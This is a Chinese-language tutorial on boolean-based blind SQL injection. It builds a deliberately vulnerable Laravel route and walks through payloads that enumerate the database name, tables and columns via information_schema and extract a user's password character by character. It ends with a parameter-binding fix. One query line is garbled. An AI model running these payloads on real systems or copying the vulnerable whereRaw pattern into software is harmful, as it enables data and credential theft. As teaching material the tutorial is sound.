通過laravel漏洞範例解析sql盲注原理

2022-07-27 14:00:39
本篇文章給大家帶來了關於的相關知識,其中主要介紹了怎樣通過造一個laravel漏洞來講解sql盲注原理,所謂的盲注就是在伺服器沒有錯誤回顯的時候完成的注入攻擊,下面一起來看一下,希望對大家有幫助。

【相關推薦:】

環境

composer create-project laravel/laravel lar9 // 安裝laravel9
// 編輯.env  修改為DEBUG=false 設定資料庫
DEBUG=false
DB_HOST=....
php artisan migrate
php artisan serve // 啟動
// 插入資料
insert into users(`name`,`email`,`password`) values('xxh','4******qq.com','worldhello');

建立漏洞

// routes/web.php
Route::get('/', function () {
 $id = request()->id;
 $user = \App\Models\User::whereRaw('id = '.$id)->first();
 return $user->name ?? '';
});
// 最後轉換的sql是: select * from users where id = $id

測試

http://127.0.0.1:8000/?id=1'
// 500
http://127.0.0.1:8000/?id=1 and 1=2
// select * from users where id = 1 and 1=2; 返回空
http://127.0.0.1:8000/?id=1 and 1=1 
// select * from users where id = 1 and 1=1 返回xxh

步驟

資料庫名

猜出資料名長度

url: http://127.0.0.1:8000/?id=1 and length(database()) = 1
select * from users where id = 1 and length(database()) = 1
select * from users where id = 1 and length(database()) = 2
// 一直迴圈下去

猜出資料庫名

從第一步 知道了資料庫名長度
`select * from users where id = 1 and substr(database(),1,1) =a` 
`select * from users where id = 1 and substr(database(),1,1) =b` 
// 一直迴圈下去 找到資料庫名的第一個做字元  然後找第二個字元  直到找完資料庫名的長度

最終: laravel_project

表名

以下的步驟和猜資料庫差不多,就簡說了。

information_schema

information_schema 是 mysql 自帶的,

資料庫名 表名 列型別 等都有記錄,猜表 欄位明需要從這個資料庫來。

猜 laravel_project 的表數量

url:   http://127.0.0.1:8000/?id=1 and (select count(*) from information_schema.tables where table_schema ="laravel_project" ) = 5
mysql> select count(*) from information_schema.tables where table_schema ="laravel_projeelect count(column_name) from information_schema.columns where table_name= ’usersct";
+----------+
| count(*) |
+----------+
|        5 |
+----------+

猜第一個表名的長度

與 [猜出資料名長度] 此不多。

猜第一個表名

url:   http://127.0.0.1:8000/?id=1 and ( select substr(table_name,1,1) from information_schema.tables where table_schema ="laravel_project" limit 0,1) = 'f'
mysql> select substr(table_name,1,1) from information_schema.tables where table_schema ="laravel_project" limit 0,1;
+------------------------+
| substr(table_name,1,1) |
+------------------------+
| f                      |
+------------------------+
// 得出第一個表的第一個欄位是f  然後查第

最終得出第一個表名稱為: failed_jobs

猜欄位

和猜表一模一樣的邏輯。

select count(column_name) from information_schema.columns where table_name= 'failed_jobs'; //  fail_jobs欄位總數

猜資料

資料這才是最重要的。

因為 failed_jobs 沒資料,所以我換成 users 來。

users 有個 password 欄位。

mysql> select substr((select password from users limit 0,1),1,1);
+----------------------------------------------------+
| substr((select password from users limit 0,1),1,1) |
+----------------------------------------------------+
| w                                                  |
+----------------------------------------------------+
得出第一個是w,存起來,最後判斷 
mysql> select substr((select password from users limit 0,1),1,2);
+----------------------------------------------------+
| substr((select password from users limit 0,1),1,2) |
+----------------------------------------------------+
| wo                                                 |
+----------------------------------------------------+
第二個值為o
用第一個值 + 第二個值作為盲注

……

防禦

(有時候 where 不滿足需求,就需要 whereRaw)

如果需要,記得繫結就好。

Route::get('/', function () {
 $id = request()->id;
 $user = \App\Models\User::whereRaw('id = ?',[$id])->first();
 return $user->name ?? '';
});

只要安份的用框架,不會會漏洞的。

那些老專案,漏洞滿地飛。

現在這個時代,找漏洞難登天。

Ps

上面為了講解簡單,用是最簡單的查詢。

手工盲注應該用二分查詢。

select * from users where id = 1 and  substr(database(),1,1) ='a';
換成二分:
 select * from users where id = 1 and  ascii(substr(database(),1,1)) > 99;

最好還是直接藉助工具 sqlmap, 直接掃出來。

【相關推薦:】

以上就是通過laravel漏洞範例解析sql盲注原理的詳細內容,更多請關注TW511.COM其它相關文章!